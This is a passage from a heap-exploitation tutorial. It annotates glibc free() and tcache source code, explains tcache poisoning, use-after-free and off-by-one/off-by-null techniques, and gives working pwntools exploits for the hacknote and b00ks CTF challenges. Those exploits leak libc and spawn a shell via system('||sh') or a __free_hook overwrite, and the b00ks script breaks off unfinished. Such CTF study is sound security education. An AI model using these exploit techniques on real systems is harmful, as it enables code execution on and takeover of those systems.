__libc_lock_lock(av->mutex);
locked = 1;
}
nextchunk = chunk_at_offset(p, size);

Lightweight checks

32
/* Lightweight tests: check whether the block is already the
top block. */
// the chunk being freed must not be the top chunk
if (__glibc_unlikely(p == av->top)) {
errstr = "double free or corruption (top)";
goto errout;
}
// the next chunk of the one being freed must not lie beyond the arena boundary
/* Or whether the next chunk is beyond the boundaries of the arena. */
if (__builtin_expect(contiguous(av) &&
(char *) nextchunk >=
((char *) av->top + chunksize(av->top)),
0)) {
errstr = "double free or corruption (out)";
goto errout;
}
// the chunk being freed must actually be marked in use, else it is a double free
/* Or whether the block is actually not marked used. */
if (__glibc_unlikely(!prev_inuse(nextchunk))) {
errstr = "double free or corruption (!prev)";
goto errout;
}
// size of the next chunk
nextsize = chunksize(nextchunk);
// next chunk size validity check:
// the next chunk's size must not be <= 2*SIZE_SZ,
// nor may nextsize exceed the memory the system has provided
if (__builtin_expect(chunksize_nomask(nextchunk) <= 2 * SIZE_SZ, 0) ||
__builtin_expect(nextsize >= av->system_mem, 0)) {
errstr = "free(): invalid next size (normal)";
goto errout;
}

Poisoning the freed memory

// fill the pointer's mem area with perturb_byte
free_perturb(chunk2mem(p), size - 2 * SIZE_SZ);

Backward consolidation — merging the lower-address chunk

    /* consolidate backward */        
if (!prev_inuse(p)) {
prevsize = prev_size(p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(av, p, bck, fwd);
}

Forward consolidation — the next chunk is not top: place into the unsorted bin

Note: if the next chunk is not the top chunk, merge with it if it is free, and put the resulting chunk into the unsorted bin.

// if the next chunk is not the top chunk
if (nextchunk != av->top) {
/* get and clear inuse bit */
// get the next chunk's in-use status
nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
// if it is free, merge; otherwise clear the current chunk's in-use bit.
/* consolidate forward */
if (!nextinuse) {
unlink(av, nextchunk, bck, fwd);
size += nextsize;
} else
clear_inuse_bit_at_offset(nextchunk, 0);

/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
*/
// 把 chunk 放在 unsorted chunk 链表的头部
bck = unsorted_chunks(av);
fwd = bck->fd;
// 简单的检查
if (__glibc_unlikely(fwd->bk != bck)) {
errstr = "free(): corrupted unsorted chunks";
goto errout;
}
p->fd = fwd;
p->bk = bck;
// 如果是 large chunk,那就设置nextsize指针字段为NULL。
if (!in_smallbin_range(size)) {
p->fd_nextsize = NULL;
p->bk_nextsize = NULL;
}
bck->fd = p;
fwd->bk = p;

set_head(p, size | PREV_INUSE);
set_foot(p, size);

check_free_chunk(av, p);
}

Next chunk is the top chunk — merge into top

/*
If the chunk borders the current high end of memory,
consolidate into top
*/
// if the chunk being freed borders the top chunk, merge it into top
else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
// DEBUG only:
check_chunk(av, p);
}

Returning memory to the system

        /*
If freeing a large space, consolidate possibly-surrounding
chunks. Then, if the total unused topmost memory exceeds trim
threshold, ask malloc_trim to reduce top.

Unless max_fast is 0, we don't know if there are fastbins
bordering top, so we cannot tell for sure whether threshold
has been reached unless fastbins are consolidated. But we
don't want to consolidate on each free. As a compromise,
consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
is reached.
*/
// if the consolidated chunk's size exceeds FASTBIN_CONSOLIDATION_THRESHOLD
// (merging into the top chunk usually ends up here),
// consider giving memory back to the system
if ((unsigned long) (size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
// consolidate any fast chunks first
if (have_fastchunks(av)) malloc_consolidate(av);
// main arena
if (av == &main_arena) {
#ifndef MORECORE_CANNOT_TRIM
// top chunk larger than the current trim threshold
if ((unsigned long) (chunksize(av->top)) >=
(unsigned long) (mp_.trim_threshold))
systrim(mp_.top_pad, av);
#endif
} else { // non-main arena: trim the heap directly
/* Always try heap_trim(), even if the top chunk is not
large, because the corresponding heap might go away. */
heap_info *heap = heap_for_ptr(top(av));

assert(heap->ar_ptr == av);
heap_trim(heap, mp_.top_pad);
}
}

if (!have_lock) {
assert(locked);
__libc_lock_unlock(av->mutex);
}

Freeing mmapped chunks

} else {
// If the chunk was allocated via mmap, release via munmap().
munmap_chunk(p);
}

tcache

The two structs

/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next; // points at the next chunk's user-data area, not the chunk header
} tcache_entry;

/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

static __thread char tcache_shutting_down = 0;
static __thread tcache_perthread_struct *tcache = NULL;

Every thread maintains a tcache_perthread_struct, the management structure for the whole tcache, holding TCACHE_MAX_BINS counters and TCACHE_MAX_BINS tcache_entry heads, where

  • tcache_entry links free (i.e. freed) chunks of the same size into a singly linked list, much like a fastbin;
  • counts records the number of free chunks on each tcache_entry list; a list holds at most 7 chunks.

Note!!

  • Starting with 2.29, tcache_entry's layout changes:
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;
  • tcache manages chunks through their mem pointers, which is why these helpers start with chunk2mem().

Basic macro definitions

/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS 64
# define MAX_TCACHE_SIZE tidx2usize (TCACHE_MAX_BINS-1)

/* Only used to pre-fill the tunables. */
# define tidx2usize(idx) (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* When "x" is from chunksize(). */
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
/* When "x" is a user-provided size. */
# define usize2tidx(x) csize2tidx (request2size (x))

/* With rounding and alignment, the bins are...
idx 0 bytes 0..24 (64-bit) or 0..12 (32-bit)
idx 1 bytes 25..40 or 13..20
idx 2 bytes 41..56 or 21..28
etc. */

/* This is another arbitrary limit, which tunables can change. Each
tcache bin will hold at most this number of chunks. */
# define TCACHE_FILL_COUNT 7
  • tcache reserves this set of special bins for every thread: 64 bins, each caching at most 7 chunks. On 64-bit the cached (usable) sizes step by 0x10 from 24 up to 1032 bytes; on 32-bit, from 12 up to 512. So tcache caches everything below the large-chunk range.
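To sanity-check the index math, here is a tiny standalone sketch (my own; only the macro is quoted from the source above), using the 64-bit constants:

#include <stdio.h>

#define MINSIZE          32   /* 64-bit defaults */
#define MALLOC_ALIGNMENT 16
#define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)

int main(void)
{
    printf("%zu\n", (size_t) csize2tidx(0x20));  /* 0  - smallest chunk (requests 0..24) */
    printf("%zu\n", (size_t) csize2tidx(0x50));  /* 3  - e.g. malloc(0x48)               */
    printf("%zu\n", (size_t) csize2tidx(0x410)); /* 63 - largest tcache-able chunk       */
    return 0;
}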

How it works

  • On the first malloc, a chunk is first allocated to hold the tcache_perthread_struct.
  • On free, when size is below the small bin limit:
  • before tcache existed, such chunks went into the fastbins or the unsorted bin
  • with tcache:
    • the chunk first goes into the matching tcache bin, until that bin is full (7 entries by default)
    • once the bin is full, further frees of that size land in the fastbins or unsorted bin as before
    • chunks in tcache are never merged (their inuse bit is not cleared)
  • On malloc, when the size is in tcache range (see the sketch below):
  • chunks are taken from the tcache first, until it is empty
  • only when the tcache bin is empty are the regular bins searched
  • when the tcache bin is empty but fastbin/smallbin/unsorted bin hold chunks of a fitting size, those chunks are first stashed into the tcache until it is full, and only then taken from the tcache; as a result the chunk order between the bin and the tcache is reversed
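A minimal sketch of the fill-and-drain behaviour described above (my own demo, assuming default tunables on glibc >= 2.26: 7 chunks per tcache bin, fastbin cap 0x80):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    void *p[8];
    for (int i = 0; i < 8; i++) p[i] = malloc(0x48);  /* eight 0x50 chunks, same bin */
    for (int i = 0; i < 8; i++) free(p[i]);  /* first 7 fill the tcache bin, the 8th goes to the fastbin */
    for (int i = 6; i >= 0; i--)             /* tcache is drained first, LIFO: p[6], p[5], ... p[0] */
        printf("from tcache:  %d\n", malloc(0x48) == p[i]);
    printf("from fastbin: %d\n", malloc(0x48) == p[7]);  /* only then does the fastbin serve */
    return 0;
}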

tcache-related code in each function

tcache_init

tcache_init(void)
{
mstate ar_ptr;
void *victim = 0;
const size_t bytes = sizeof (tcache_perthread_struct);

if (tcache_shutting_down)
return;

arena_get (ar_ptr, bytes); // find a usable arena
victim = _int_malloc (ar_ptr, bytes); // allocate a chunk of sizeof(tcache_perthread_struct)
if (!victim && ar_ptr != NULL) // on failure, retry once with another arena
{
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}
if (ar_ptr != NULL)
__libc_lock_unlock (ar_ptr->mutex);

/* In a low memory situation, we may not be able to allocate memory
- in which case, we just keep trying later. However, we
typically do this very early, so either there is sufficient
memory, or there isn't enough memory to do non-trivial
allocations anyway. */
// i.e. if the allocation fails, just try again later; this mostly matters when memory is tight
if (victim) // initialize the tcache
{
tcache = (tcache_perthread_struct *) victim;
memset (tcache, 0, sizeof (tcache_perthread_struct));
}
}

#define MAYBE_INIT_TCACHE() \
if (__glibc_unlikely (tcache == NULL)) \
tcache_init();

__libc_malloc

void *
__libc_malloc (size_t bytes)
{
......
......
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
// compute the real chunk size from the malloc argument, then the matching tcache index
checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);

// initialize the tcache if needed
MAYBE_INIT_TCACHE (); // runs tcache_init() when tcache is still NULL
DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins // the idx derived from the size is in range
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL) // tcache->entries[tc_idx] holds a chunk
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif
......
......
}

_int_malloc 2.36

(1) First, when the requested size is fastbin-sized and a usable free chunk is found in the fastbin, the other chunks on that fastbin list are stashed into the tcache.

#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
if (SINGLE_THREAD_P)
*fb = REVEAL_PTR (tc_victim->fd);
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif

(2) Next, when the requested size is smallbin-sized and a usable free chunk is found in the smallbin, the other chunks on that smallbin list are stashed into the tcache. source

(3) While looping over the unsorted bin, a chunk of exactly matching size is not returned immediately; it is first put into the tcache and processing continues. source

(4) In the big unsorted-bin loop, once the number of chunks stashed into the tcache reaches the configured maximum, malloc returns at once. The default is 0, meaning no limit.

(5) After the unsorted-bin loop, if chunks were stashed into the tcache along the way, one is taken out and returned, tracked via the return_cached variable. A sketch of the resulting order reversal follows.
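A small demo of that reversal (my own sketch, default tunables as before): with three chunks left in the fastbin, the first malloc returns the head and stashes the remaining two into the tcache head-first, so they come back out swapped:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    void *p[10];
    for (int i = 0; i < 10; i++) p[i] = malloc(0x48);
    for (int i = 0; i < 10; i++) free(p[i]);
    /* tcache (7): p[6] -> ... -> p[0];  fastbin: p[9] -> p[8] -> p[7] */
    for (int i = 0; i < 7; i++) malloc(0x48);    /* drain the tcache bin */
    /* the next malloc takes p[9] off the fastbin and stashes p[8], then p[7],
       into the tcache, which therefore reads p[7] -> p[8]: order reversed */
    printf("%d ",  malloc(0x48) == p[9]);
    printf("%d ",  malloc(0x48) == p[7]);
    printf("%d\n", malloc(0x48) == p[8]);
    return 0;
}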

tcache_get()

A look at tcache_get():

/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]); // one chunk taken out, counts decremented
return (void *) e;
}

//2.31
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}
  • tcache_get() is the retrieval path, and it is very simple: take the first chunk off tcache->entries[tc_idx] and decrement tcache->counts — with almost no protection at all.
  • The two asserts missing from the 2.31 version are already checked before the call; given the "to appease gcc" remark, just treat them as absent.

__libc_free()

Having covered allocation, now the free path with tcache present:

void
__libc_free (void *mem)
{
......
......
MAYBE_INIT_TCACHE ();
ar_ptr = arena_for_chunk (p);
_int_free (ar_ptr, p, 0);
}
  • __libc_free() changes very little; MAYBE_INIT_TCACHE() does nothing when tcache is already non-NULL.

_int_free()

Stepping into _int_free():

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
......
......
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache
&& tc_idx < mp_.tcache_bins // 64
&& tcache->counts[tc_idx] < mp_.tcache_count) // 7
{
tcache_put (p, tc_idx);
return;
}
}
#endif
......
......
  • If tc_idx is valid and tcache->counts[tc_idx] is still under 7, tcache_put() is entered, receiving the chunk being freed and the tcache index matching its size.

tcache_put()

/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;

e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
  • tcache_put() inserts the freed chunk at the head of the tcache->entries[tc_idx] list, again with almost no protection — and p is not zeroed.

Exploitation angles

  • tcache poisoning: simply overwrite the next pointer (see the sketch below).
  • tcache dup: free the same chunk several times.
  • smallbin unlink: when a chunk is found by traversing the smallbin, other chunks of the same size are also moved into the tcache, with missing checks. (Not familiar with this one.)
  • tcache stashing unlink attack: not familiar with this one either.
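A minimal tcache-poisoning sketch (my own demo; it assumes glibc 2.26-2.31, i.e. before safe-linking started mangling next in 2.32, and models the UAF write directly):

#include <stdio.h>
#include <stdlib.h>

long target[2]; /* two slots so tcache_get's e->key = NULL write (2.29+) stays in bounds */

int main(void)
{
    long *a = malloc(0x48);
    long *b = malloc(0x48);
    free(a);
    free(b);                    /* the 0x50 tcache bin now reads: b -> a */
    b[0] = (long) target;       /* the "UAF" write: b->next = target */
    malloc(0x48);               /* returns b */
    long *evil = malloc(0x48);  /* returns target */
    *evil = 0xdeadbeef;         /* arbitrary write achieved */
    printf("target[0] = %#lx\n", target[0]);
    return 0;
}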

UAF

Principle

Put simply, Use After Free is exactly what the name says: a block of memory is used again after it has been freed. In practice there are a few cases:

  • After the block is freed, its pointer is set to NULL and then used — the program just crashes.
  • After the block is freed, its pointer is not set to NULL, and no code touches the block before its next use — the program will most likely run fine.
  • After the block is freed, its pointer is not set to NULL, but some code modifies the block before its next use — then strange things are very likely to happen when the program uses it again.

The UAF vulnerabilities we usually mean are the latter two cases. A pointer that is left dangling after its block is freed (not set to NULL) is called a dangling pointer. A minimal demonstration follows.
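A sketch of the dangerous cases (my own demo; with tcache, a second malloc of the same size typically hands back the very block just freed):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char *p = malloc(0x20);
    strcpy(p, "hello");
    free(p);                 /* p is now a dangling pointer: it was not set to NULL */
    char *q = malloc(0x20);  /* same size: the allocator returns the same block */
    strcpy(q, "hacked");
    printf("%s\n", p);       /* reading through the dangling pointer prints "hacked" */
    return 0;
}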

Example – pwnable.tw hacknote

The challenge binary can be downloaded here.

# root @ Kiprey in ~/Desktop/Pwn [14:16:43]
$ checksec hacknote
[*] '/root/Desktop/Pwn/hacknote'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)

Key functions

add

unsigned int add()
{
int v0; // ebx
int i; // [esp+Ch] [ebp-1Ch]
int size; // [esp+10h] [ebp-18h]
char buf[8]; // [esp+14h] [ebp-14h] BYREF
unsigned int v5; // [esp+1Ch] [ebp-Ch]

v5 = __readgsdword(0x14u);
if ( dword_804A04C <= 5 ) // at most five notes
{
for ( i = 0; i <= 4; ++i )
{
if ( !*(&ptr + i) ) // slot empty? ptr looks like an array whose elements point to note chunks
{
*(&ptr + i) = malloc(8u); // malloc 8 bytes
if ( !*(&ptr + i) )
{
puts("Alloca Error");
exit(-1);
}
*(_DWORD *)*(&ptr + i) = sub_804862B;
printf("Note size :");
read(0, buf, 8u);
size = atoi(buf);
v0 = (int)*(&ptr + i);
*(_DWORD *)(v0 + 4) = malloc(size); // so each array element points to a struct of two pointers:
// the first is the function pointer sub_804862B, the second the malloc'd content pointer
if ( !*((_DWORD *)*(&ptr + i) + 1) )
{
puts("Alloca Error");
exit(-1);
}
printf("Content :");
read(0, *((void **)*(&ptr + i) + 1), size);
puts("Success !");
++dword_804A04C;
return __readgsdword(0x14u) ^ v5;
}
}
}
else
{
puts("Full");
}
return __readgsdword(0x14u) ^ v5;
}

delete

unsigned int sub_80487D4()
{
int v1; // [esp+4h] [ebp-14h]
char buf[4]; // [esp+8h] [ebp-10h] BYREF
unsigned int v3; // [esp+Ch] [ebp-Ch]

v3 = __readgsdword(0x14u);
printf("Index :");
read(0, buf, 4u);
v1 = atoi(buf);
if ( v1 < 0 || v1 >= dword_804A04C )
{
puts("Out of bound!");
_exit(0);
}
if ( *(&ptr + v1) )
{
free(*((void **)*(&ptr + v1) + 1));// free the content first
free(*(&ptr + v1)); // then free the note chunk
puts("Success"); // neither pointer is set to NULL
}
return __readgsdword(0x14u) ^ v3;
}

print

unsigned int print()
{
int v1; // [esp+4h] [ebp-14h]
char buf[4]; // [esp+8h] [ebp-10h] BYREF
unsigned int v3; // [esp+Ch] [ebp-Ch]

v3 = __readgsdword(0x14u);
printf("Index :");
read(0, buf, 4u);
v1 = atoi(buf);
if ( v1 < 0 || v1 >= dword_804A04C )
{
puts("Out of bound!");
_exit(0);
}
if ( *(&ptr + v1) )
//*(&ptr + v1) is the note pointer; the first field of the note is a function pointer,
//so this calls the puts-like print function stored there, passing the note itself
(*(void (__cdecl **)(_DWORD))*(&ptr + v1)) (*(&ptr + v1));
return __readgsdword(0x14u) ^ v3;
}

Analysis

  • UAF — use after free. Using memory after free generally requires that the pointer was not set to NULL after the free; that is the telltale sign of a UAF.

  • The delete function here indeed never NULLs the pointers after free. Using the fastbin list's behavior, we can make a writable pointer point at the func member of a freed note, then rewrite that pointer and get the function it points to executed.

  • Walkthrough (for convenience, call the chunk allocated for the content the "content chunk" and the chunk allocated for the note struct the "note chunk"):

    1. First create two notes, note0 and note1, each with content size > 12 so that the content chunk is larger than the note chunk. A note chunk's user size is (8+4) bytes; a content chunk's user size is (requested size + 4).
    That way, when both notes are freed, the two note chunks end up in one fastbin index while the two content chunks end up in another; note chunks and content chunks do not interfere in the fastbins.

    2. The second step is to create a new note2 with content size <= 12, so its content chunk is carved out of note1's old note chunk in the fastbin, becoming note2's content chunk.
    3. Note: when the program finally calls system, the argument is the note's own address, so [system addr] and the following 4 bytes are interpreted as the command string. Yet [system addr] must stay in place — so how do we get a shell?
      The trick is to put "||sh" in the last four bytes, making the command system("[system addr]||sh").
      Since [system addr] is sure to fail as a command, the sh after || runs, and we get a shell.

Exploit plan

  1. Create note0 and note1, both with content size greater than 12.

  2. Free note0 and note1.

  3. Create note2 with content size <= 12.

    note2->content now points at note1, and writing note2's content during creation rewrites that memory:

    • set note1->func to the print function (the function the func pointer holds by default)
    • set note1->content to got@__libc_start_main (any already-resolved function's GOT entry works)
  4. Print note1 to leak the libc base and thus locate the address of system.

  5. Free note2 and create it again, content size still <= 12, this time writing:

    • note1->func = the address of system
    • note1->content = the string "||sh"
  6. Print note1 again: this runs system("...||sh") — shell!

EXP

# -*- coding: utf-8 -*-
from pwn import *

io = remote("chall.pwnable.tw", 10102)

libc = ELF("./libc_32.so.6")
e = ELF("./hacknote")

context(terminal=['gnome-terminal', '-x', 'bash', '-c'], os='linux', arch='x86')
# context.log_level = 'debug'

def addnote(len, content):
io.sendlineafter("Your choice :", "1")
io.sendlineafter("Note size :", str(len))
io.sendlineafter("Content :", content)

def delnote(index):
io.sendlineafter("Your choice :", "2")
io.sendlineafter("Index :", str(index))

def printnote(index):
io.sendlineafter("Your choice :", "3")
io.sendlineafter("Index :", str(index))

# create note0 and note1, then delete them; mind the deletion order
addnote(16, '')
addnote(16, '')
delnote(1)
delnote(0)
# create note2, write the payload, and trigger the print
addnote(8, flat(0x0804862B, e.got['read']))
printnote(1)
# the previous step leaked a libc address; derive system's address from it
libc_read_addr = u32(io.recv(4))
log.success('libc read addr: ' + hex(libc_read_addr))
# delete note2
delnote(2)

libcbase_addr = libc_read_addr - libc.symbols['read']
system_addr = libcbase_addr + libc.symbols['system']

log.success('libcbase addr: ' + hex(libcbase_addr))
log.success('system addr: ' + hex(system_addr))
# gdb.attach(io)
# recreate note2, writing system's address and the '||sh' string, then trigger
addnote(8, flat(system_addr, '||sh')) # 8 or 12 both work

printnote(1)
# get shell!
io.interactive()

Off-by-one

  1. When the overflowed byte is fully controlled: corrupt a size field so chunk structures overlap, then leak or overwrite other chunks' data. The NULL-byte method below also applies.
  2. When the overflowed byte is a NULL byte: with a size like 0x100, the NULL overflow clears prev_inuse, so the previous chunk is treated as free. (1) You can then apply the unlink technique (see the unlink section). (2) Alternatively, the prev_size field becomes live, and a forged prev_size makes chunks overlap. The key point is that unlink did not check whether the chunk found via prev_size actually has a size matching prev_size.

The newest code adds a check against the second variant of 2, but 2.28 and earlier do not have it.

/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = prev_size (p);
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
/* the next two lines are new; they kill variant (2) above, but 2.28 and earlier lack them */
if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size while consolidating");
unlink_chunk (av, p);
}
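A sketch of the primitive itself (my own demo; sizes are illustrative and the overflow is modeled by a direct write). One NUL byte past the end of a clears the PREV_INUSE bit in b's size field, and a forged prev_size sets up exactly the state the consolidate-backward code above inspects:

#include <stdlib.h>
#include <string.h>

int main(void)
{
    char *a = malloc(0x108);         /* chunk size 0x110 */
    char *b = malloc(0x1f0);         /* next chunk: its size field reads 0x201 */

    memset(a, 'A', 0x108);
    a[0x108] = '\0';                 /* the off-by-one NUL: b's size 0x201 -> 0x200,
                                        PREV_INUSE cleared */
    *(size_t *)(a + 0x100) = 0x110;  /* forge prev_size at the end of a's user area;
                                        an attacker lies here to overlap chunks */
    /* free(b) would now consolidate backward using the forged prev_size */
    return 0;
}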

After libc 2.29

With the addition of these two lines,

if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size while consolidating");

it is hard to control the size field of a real chunk, so the classic off-by-null technique no longer works. However, the check only requires that the chunk being unlinked is contiguous with the next chunk, so we can still forge a fake_chunk.

The forgery reuses the fd_nextsize and bk_nextsize pointers left behind in a large bin chunk: fd_nextsize acts as the fake_chunk's fd and bk_nextsize as its bk. That gives full control over the fake_chunk's size field (this clobbers the original large bin chunk's fd pointer, which does not matter) while also controlling its fd (by partially overwriting fd_nextsize). With other chunks behind it assisting the forgery, this check can be passed:

if (__glibc_unlikely (chunksize(p) != prevsize))
malloc_printerr ("corrupted size vs. prev_size while consolidating");

After that, only the unlink checks remain, i.e. fd->bk == p && bk->fd == p.

If the large bin holds exactly one chunk, both of its nextsize pointers point to itself, as follows.

We can point fd_nextsize at any heap address; it is easy to aim it at some fastbin chunk + 0x10 - 0x18. That fastbin chunk's fd also points into the heap, and partially overwriting it can make it point back at the original large bin + 0x10, passing the fd->bk == p check.

Since bk_nextsize cannot be modified, bk->fd necessarily falls on the original large bin chunk's fd (the one we clobbered). The fastbin list structure lets us rewrite that pointer without disturbing other data, and a partial overwrite then passes the bk->fd == p check.

Then consolidating backward via the off-by-one yields chunk overlapping, after which we can leak libc_base and a heap address, and hit __free_hook through tcache.

Example: Asis CTF 2016 b00ks

First patch the binary to use glibc 2.27 — any version below 2.29 behaves the same.


On startup the program asks for an author name, which the change function can later modify; the maximum length is 32. However, the bounds check in the stdin_read function is wrong, so the terminating NUL byte overflows by one.

create's malloc order: name -> description -> book. The first two sizes are user-chosen; the book is 0x20 bytes.

The .data layout shows the author name sitting right above the slot_array, an array of pointers to book structs; the struct itself is allocated with malloc:

struct book{
int id; // 8 bytes after alignment
char* name;
char* description;
int size;
};

So first let the author name's trailing NUL overflow into the lowest byte of book1's pointer; reading the details then prints book1's pointer along with the name, leaking a heap address.

We can also use the zeroed low byte to make the pointer land inside a heap block we control (say, a description modified via edit). The program then treats that block as a book struct, dereferencing its name and desc pointers on print; edit can further change the address desc points at — giving arbitrary read and write.

Concretely:

  • At program start the first malloc begins at 0x5633ca39c260 — note the low three nibbles 0x260.
  • For the exploit, book1's desc mem pointer (as opposed to the chunk pointer — recall chunk2mem) must have 0x00 as its lowest byte.
  • The nearest such address is 0x300, so the desc chunk pointer is 0x2f0, leaving 0x90 for the name chunk.
  • A 0x90 chunk means requesting 0x80, i.e. create(0x80, 'a', 0x50, 'a').

In gdb, after all of this, book1's pointer with its lowest byte zeroed lands exactly on book1's desc user pointer:

[screenshot omitted]
  • Then forge a book struct inside the desc: its name and desc fields both give arbitrary read, and desc gives arbitrary write (through edit).

From one heap address we can derive the ELF base and the relative positions of the other chunks. The next target is something like __free_hook (free's GOT entry is unusable because of FULL RELRO), which needs the libc base. Two ways to get it:

  1. via mmap: an mmap-allocated chunk sits at a fixed offset from libc;
  2. via a large bin's fd_nextsize: with only one size class in the bin, it points at the large bin head inside libc.

mmap is only used when the top chunk cannot satisfy the request (usually: at program start the top chunk is the largest chunk, so just request more than that); gdb shows the top chunk is initially 0x21000. The first two chunks hold the heap-management structures, so directly requesting a 0x21000 block works. Also write '/bin/sh' into name or desc.

After the allocation:

[screenshot omitted]

name and desc were placed at these two locations:

[screenshot omitted]

Note we requested 0x21000 but got 0x22000: the 0x10-byte header is added and the result is page-aligned.

It turns out there is a randomized gap between the two anonymous mappings after ld.so, and the mmap'd block most likely lands in the mapping after the gap, so its offset to libc.so is not constant. When randomization happens to place everything inside the ld.so area the offset works — just retry a few times.

The flow from here:

  • Edit book1's fake desc chunk to perform one arbitrary read of book2's name pointer; its address is the leaked book1 address plus an offset.
  • The two book chunks are adjacent; offsets 0x38 and 0x40 locate book2's name and desc pointer slots.
  • Then locate __free_hook,
  • use the desc arbitrary write to overwrite __free_hook with system,
  • call delete,
  • shell.
from pwn import *
binary = './b00ks'
context.binary = binary
context.log_level = 'debug'
p = process(binary)
ss=lambda x:p.send(x) #send string
sl=lambda x:p.sendline(x)
ru=lambda x:p.recvuntil(x)
rl=lambda :p.recvline()
ra=lambda :p.recv() #recv a
rn=lambda x:p.recv(x) #recv n
itt=lambda :p.interactive()
sla=lambda x,y:p.sendlineafter(x,y)

def firstAuthorName(name:str):
ru('name: ')
sl(name)

def create(name_size, name, desc_size, desc):
ru('> ')
sl('1')
ru(': ')
sl(str(name_size))
ru(': ')
sl(name)
ru(': ')
sl(str(desc_size))
ru(': ')
sl(desc)

def change(authorName):
ru('> ')
sl('5')
ru(': ')
sl(authorName)

def edit(id: int, desc: bytes):
ru('> ')
sl('3')
ru(': ')
sl(str(id))
ru(': ')
sl(desc)
left = rl()+rl()
if b'Unable' in left:
log.error('aslr not match expection!')

def get_detail() -> tuple[int, bytes, bytes, bytes]:
'''only support get first book!!'''
ru(b'> ')
sl(b'4')
line = rl()
id = int.from_bytes(line[4:], byteorder='little')
name = rl()[6:]
desc = rl()[len('Description: '):]
author = rl()[len('Author: '):]
return id, name, desc, author

def delete(id):
ru('> ')
sl('2')
ru(': ')
sl(str(id))

#main function!!!
def main():
firstAuthorName(cyclic(32))
create(0x80, 'a', 0x50, 'a')
create(0x20000-0x10, '/bin/sh', 0x20000-0x10, '/bin/sh')
id, name, desc, author = get_detail()
book1_addr = int.from_bytes(author[32:32+6], byteorder='little')
log.success(f'get book 1 struct pointer: {hex(book1_addr)}')

# addr-0x60 point to itself in book1_desc
payload = flat([1, book1_addr+0x38, book1_addr-0x60, 0x50])
edit(1, payload)
change(cyclic(32))
id, name, desc, author = get_detail()
book2_name_addr = int.from_bytes(name, byteorder='little') & 0xffffffffffff
log.success(f'book2 name addr: {hex(book2_name_addr)}')

libc = ELF('/glibs/2.27-3ubuntu1_amd64/libc-2.27.so')
libc_base = book2_name_addr - 0x606010
__free_hook_addr = libc_base + libc.symbols['__free_hook']
system_addr = libc_base + libc.symbols['system']
log.success(f'__free_hook: {hex(__free_hook_addr)}\t system_addr: {hex(system_addr)}')

payload = flat([1, book1_addr+0x38+0x90, __free_hook_addr, 0x50])
edit(1, payload)
